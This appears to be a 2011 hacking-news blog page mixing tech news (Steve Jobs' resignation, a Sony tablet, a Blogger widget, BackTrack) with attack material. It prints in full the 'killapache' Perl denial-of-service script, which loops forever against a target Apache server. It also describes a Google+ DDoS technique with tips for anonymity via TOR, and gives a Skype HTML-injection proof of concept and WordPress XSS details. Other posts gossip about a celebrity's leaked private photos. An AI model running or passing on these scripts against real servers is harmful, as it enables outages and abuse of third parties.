Julianne Houghs Phone Hacked

Singer/actress Julianne Houghs phone hacked and private photos of her have been published in the internet. Not much informations is available now about this hack. A picture of Julianne Hough in bikini is available online claiming that, the picture is from the hacked phone. And her other collection of pics includes, photos of her on various film sets, including upcoming movies Footloose and Rock of Ages and images of her with boyfriend Ryan Seacrest etc.

DDOS using google servers

Its true google helps everyone.Recently we had killapache dos now we have ddos + proxy with the help of google +
How does DDOS via google+ works?
The vulnerable pages are “/_/sharebox/linkpreview/“ and “gadgets/proxy?“
Is possible to request any file type, and G+ will download and show all the content. So, if you parallelize so many requests, is possible to DDoS any site with Google bandwidth. Is also possible to start the attack without be logged in G+.

Attack vectors:

The advantage of using Google and make requests through their servers, is to be even more anonymous when you attack some site (TOR+This method); The funny thing is that apache will log Google IPs.
But beware: gadgets/proxy? will send your ip in apache log, if you want to attack, you’ll need to use /_/sharebox/linkpreview/




+DDoS source code download:

http://www.ihteam.net/advisories/_154785695367_+ddos.sh

source

EDIT - This vulnerability have been patched !

MSN.Com Vulnerable to XSS

TeamDX discovered XSS Vulnerability in MSN.Com. The Vulnerable Link here.  XSS is a computer security vulnerability that helps attackers to inject client-side script into web pages viewed by other users. 

Killapache: DDOS Tool For Apache Servers

The Apache Software Foundation has announced a denial-of-service vulnerability that affects all versions of the ubiquitous Apache web server, leaving up to 65% of all websites vulnerable. A unknown flaw in the code for processing byte range headers allows versions 2.2.x of the Apache Web Server to be crippled from a single PC. A suitable “Apache Killer” Perl script that impressively demonstrates the problem.


Advisory - Click here 


How does killapache DDOS tool work?
killapache sends GET requests with multiple “byte ranges” that will claim large portions of the system’s memory space. A “byte range” statement allows a browser to only load certain parts of a document, for example bytes 500 to 1000. It is normally used while downloading large files. This method is used by programs such as download clients to resume downloads that have been interrupted; it is designed to reduce bandwidth requirements. However, it appears that stating multiple unsorted components in the header can cause an Apache server to malfunction.

The code

1. #Apache httpd Remote Denial of Service (memory exhaustion)


2. #By Kingcope


3. #Year 2011


4. #


5. # Will result in swapping memory to filesystem on the remote side


6. # plus killing of processes when running out of swap space.


7. # Remote System becomes unstable.


8. #


9.  


10. use IO::Socket;


11. use Parallel::ForkManager;


12.  


13. sub usage {


14.         print "Apache Remote Denial of Service (memory exhaustion)\n";


15.         print "by Kingcope\n";


16.         print "usage: perl killapache.pl <host> [numforks]\n";


17.         print "example: perl killapache.pl www.example.com 50\n";


18. }


19.  


20. sub killapache {


21. print "ATTACKING $ARGV[0] [using $numforks forks]\n";


22.        


23. $pm = new Parallel::ForkManager($numforks);


24.  


25. $|=1;


26. srand(time());


27. $p = "";


28. for ($k=0;$k<1300;$k++) {


29.         $p .= ",5-$k";


30. }


31.  


32. for ($k=0;$k<$numforks;$k++) {


33. my $pid = $pm->start and next;  


34.        


35. $x = "";


36. my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],


37.                                  PeerPort => "80",


38.                                          Proto    => 'tcp');


39.  


40. $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";


41. print $sock $p;


42.  


43. while(<$sock>) {


44. }


45.  $pm->finish;


46. }


47. $pm->wait_all_children;


48. print ":pPpPpppPpPPppPpppPp\n";


49. }


50.  


51. sub testapache {


52. my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],


53.                                  PeerPort => "80",


54.                                          Proto    => 'tcp');


55.  


56. $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";


57. print $sock $p;


58.  


59. $x = <$sock>;


60. if ($x =~ /Partial/) {


61.         print "host seems vuln\n";


62.         return 1;      


63. } else {


64.         return 0;      


65. }


66. }


67.  


68. if ($#ARGV < 0) {


69.         usage;


70.         exit;  


71. }


72.  


73. if ($#ARGV > 1) {


74.         $numforks = $ARGV[1];


75. } else {$numforks = 50;}


76.  


77. $v = testapache();


78. if ($v == 0) {


79.         print "Host does not seem vulnerable\n";


80.         exit;  


81. }


82. while(1) {


83. killapache();


84. }

Create Google+ Add To Circles Include update feed Widget For Blogger

Create Google+ “Add To Circles” Include update feed Widget For Blogger

Create Google+ “Add To Circles” Include update feed Widget For Blogger with real time followers stats of your Google Plus circles and with a “Add me To Circles”  Include update feed Button. The Widget is completely customizable and will blend any site theme perfectly. The number of followers displayed by the widget is automatic. You just need to fetch the code and paste it on your blogs. Lets know how!
Create Google+ “Add To Circles” Include update feed Widget For Blogger

1. You just need to visit Google Plus widget homepage i.e. Click here


2. Click the Get Widget button

Create your widget by using the tabs to fully customize the look of your button

Enter your Google+ ID in the basic settings tab

You can get your Plus ID by going to your Google Plus profile page and then copy the digital code from your browser address bar as shown below

1. Set the Widget width equal to the width of your sidebar. In my case I have kept it 292


2. You can also change the language of the add me button from basic settings.  Currently 9 languages are supported.

1. Once you are done simple hit the Get Code button at the top. Copy the code and then go to Blogger > Design


2. Select a HTML/JavaScript widget


3. Paste your code inside it and hit save.


4. You are all done!

Do let me know if you needed any further assistance. Have Fun. :)

Steve Jobs Resigns As CEO Of Apple

Today apple CEO Steve Jobs resigned here is the letter by steve jobs

To the Apple Board of Directors and the Apple Community:

I have always said if there ever came a day when I could no longer meet my duties and expectations as Apple’s CEO, I would be the first to let you know. Unfortunately, that day has come.

I hereby resign as CEO of Apple. I would like to serve, if the Board sees fit, as Chairman of the Board, director and Apple employee.
As far as my successor goes, I strongly recommend that we execute our succession plan and name Tim Cook as CEO of Apple.

I believe Apple’s brightest and most innovative days are ahead of it. And I look forward to watching and contributing to its success in a new role.
I have made some of the best friends of my life at Apple, and I thank you all for the many years of being able to work alongside you.
Steve



Apple has confirmed that Apple COO Tim Cook will replace Jobs as CEO, following Jobs’ own recommendation. Considering that Cook has filled in for Jobs in the times of his medical leaves (including the one he has been on this year), this has been widely expected if and when it came time for Jobs to step down. Also as requested, Jobs has been elected as Chairman of the Board and will remain with the company in that capacity. Cook will join the Board as well.

Sony Tablet S (S1) Could Be Launched Next Month

The tablet will mark Sony's entry into the Android tablet scene.

Sony has been teasing the S1 and the foldable dual screen S2 tablet since quite some time now, but we weren't given a definitive launch date. However, now it seems like we could see the tablet in action pretty soon. It has been reported that the S1 tablet will break cover as early as next month and will be called the Sony Tablet S. Obviously, S1 was just the preliminary name given to the tablet so as to keep the real name under wraps. This info comes from a bunch of spy shots captured by a source. The September launch sounds pretty relevant since the company originally intended to launch the device during the same time frame.

The spy shots also shed some light on the tablet's features. Apparently, the Tablet S will feature Sony's Music and Video Unlimited service, which will let users download video and audio content seamlessly. Additionally, the Tablet S is PlayStation certified and will come packing with some games which can also be downloaded from a vast collection. Hardware wise, the S Tablet will feature a 9.4" display with TruBlack and the Sony Bravia technology, a 5 MP camera on the back with a 3 MP camera on the front for video calls. It will be powered by a 1 GHz dual core NVIDIA Tegra 2 processor, and feature DLNA capabilities for easy sharing, along with the ability to run as an infrared remote. It will run on the Android 3.1 Honeycomb with a 3.2 update on the horizon, though we have every reason to believe that the tablet will run Android 3.2 out of the box.

As far as the pricing of the device is concerned, it is believed that the Tablet S will be priced somewhere around $600 (Rs. 27,000 approx), which goes well with the current lot of Honeycomb tablets that are available in the market. People have high hopes with Sony and it is expected that the company will not disappoint. We'll have to wait until next month to find out if Sony has produced a winner with the Tablet S.

Facebook official security guide

Recently Facebook released - 14 pages in all - Facebook Security Guide, written by former Senior Director of Internet Safety at Symantec Linda McCarthy, security research engineer at Purdue University Keith Watson and teacher and editor Denise Weldon-Siviy, offers tips on:

•  Protecting your Facebook account


• Avoiding the scammers (very helpful examples of the most popular Facebook scams)


• Using advanced security settings (one-time passwords, secure browsing, singel sign-on, social authentication, etc.)


• Recovering a hacked Facebook account


• Stopping imposters.

Written in a manner understandable to anyone and everyone, it should be a required read for everybody who begins using the social network and for many old users who are ignorant of the fact that they need protection.



Click To Download

Wordpress 3.2.1 persistent xss exploit

Wordpress 3.2.1 persistent xss exploit

Here is Wordpress 3.2.1 Core (post-template.php) Improper Sanitizing(Persistent XSS)by silentph33r aka Darshit Ashara.This is author level vulnerability

Recently wordpress vulnerabiltiy reported in timthumb & now new vulberability is discovered in core modules

Author : Darshit Ashara
Contact : john_pwnr@yahoo.com
Love to : A Gondela, Y Jaygadkar, A Dhaka, Rahul Sasi,
Team Indishell and Garage4hackers.

=======================================================
Improper sanitized code in Wordpress Core Module(post-template.php)
Causing Cross site Scripting.
and its will give out alert on index page and post page.


Below are the temporary patches for fixing.
Vendor notified about this vulnerability.



/*This will patch XSS in Index Page*/
Vulnerable Code Part 1

function the_title($before = '', $after = '', $echo = true) {
    $title = get_the_title();

    if ( strlen($title) == 0 )
        return;

    $title = $before . $title . $after;

    if ( $echo )
        echo htmlentities($title); /* Line No 52 Patch*/
    else
        return htmlentities($title); /* Line No 54 Patch*/}  

 Vulnerable Code Part 2

function the_title_attribute( $args = '' ) {
    $title = get_the_title();

    if ( strlen($title) == 0 )
        return;

    $defaults = array('before' => '', 'after' =>  '', 'echo' => true);
    $r = wp_parse_args($args, $defaults);
    extract( $r, EXTR_SKIP );


    $title = $before . $title . $after;
    $title = esc_attr(strip_tags($title));

    if ( $echo )
        echo htmlentities($title) ;/* Line No 87 Patch here By adding htmlentities*/
    else
        return htmlentities($title); /* Line No 89 Patch*/
} 

Patch for this wordpress vulnerability

Vulnerable Code Part 3
function get_the_title( $id = 0 ) {
    $post = &get_post($id);

    $title = isset($post->post_title) ? $post->post_title : '';
    $id = isset($post->ID) ? $post->ID : (int) $id;

    if ( !is_admin() ) {
        if ( !empty($post->post_password) ) {
            $protected_title_format = apply_filters('protected_title_format', __('Protected: %s'));
            $title = sprintf($protected_title_format, $title);
        } else if ( isset($post->post_status) && 'private' == $post->post_status ) {
            $private_title_format = apply_filters('private_title_format', __('Private: %s'));
            $title = sprintf($private_title_format, $title);
        }
    }
    return htmlentities(apply_filters( 'the_title', $title, $id )); /* Line No 119 Patch*/
} 

Skype Zeroday HTML/Javascript code injection

Noptri Public Security has released a working Skype zero day vulnerability with POC for Skype. Skype users need be aware of this vulnerability.

Vendor:

=======

Skype - http://www.skype.com/





Affected Product:

=================

Skype in version <= 5.5.0.113





Affected Platforms:

===================

Windows (XP, Vista, 7)

Problem Description:

====================

Skype suffers from a persistent code injection vulnerability due to a lack

of input validation and output sanitization of following profile entries:

    

    [+] home

    [+] office

    [+] mobile

POC of Skype 0day vulnerability 

The following HTML codes can be used to trigger the described vulnerability:



--- SNIP ---



    [+] Home Phone Number:

    <b>INJECTION HERE</b>



    [+] Office Phone Number:

    <center><i>INJECTION HERE</i></center>

    

    [+] Mobile Phone Number:

    <a href="#">INJECTION HERE</a>



--- SNIP ---

By using this code An attacker could for example inject HTML/Javascript code. It has not been verified though, if it's possible to hijack cookies or to attack the underlying operating system. Attacker could give a try using extern .js files

BART Police Database Hacked by Anonymous #OpBART

Database with information about the members of the police BART (Bay Area Rapid Transit) is exposed by anonymous hackers in the #OpBart operation.

The database, published on Pastebin, contained information on names, addresses and accounts for more than 100 police officers. The Pastebin also contained a link to the campaign OpBart that is executed by Hacktivist group Anonymous.

The reason behind Anonymous operation is “censorship” of the subterranean cellular voice and data network in San Francisco’s Bay Area Rapid Transit system (BART) while people protesting about the fatal shooting of a homeless man by BART(Bay Area Rapid Transit) police.

Anonymous user database attacked BART before. During the campaign OpBart published data on the 3000 accounts of the police obtained from the site MyBart.

The group argues that they protest the recent shootings, organized by Bart Police, as well as the agency’s decision to disable wireless connections to disrupt the protests in San Francisco.

While the Police Officers Association website BART (BART Police Officer’s Association) was unavailable, the agency published a message on their official website, which condemned the attack.

“We condemn this latest attack on the working men and women of BART,” interim general manager Sherwood Wakeman said in a statement. “We are deeply concerned about the safety and security of our employees and their families. We stand behind them and our customers who were the subject of an earlier attack. We are deeply troubled by these actions.”

No matter who carried out this attack securing the data is one of the most important steps that we should care about, if we have such sensitive information we need to keep them offline so no one can have them. Or we need to have a security audit and periodic penetration test to have a clear idea if our databases are vulnerable to attack or not.

Backtrack 5 R1 Released

BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless if you’re making BackTrack your primary operating system, booting from a LiveDVD.BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.




The Change Log -

• This release contains over 120 bug fixes, 30 new tools and 70 tool updates.


• The kernel was updated to 2.6.39.4 and includes the relevant injection patches

on the word of the backtrack developers " We are really happy with this release, and believe that as with every release, this is our best one yet. Some pesky issues such as rfkill in VMWare with rtl8187 issues have been fixed, which provides for a much more solid experience with BackTrack. We’ve released Gnome and KDE ISO images for 32 and 64 bit (no arm this release, sorry!), as well as a VMWare image of a 32 bit Gnome install, with VMWare Tools pre-installed."

DOWNLOAD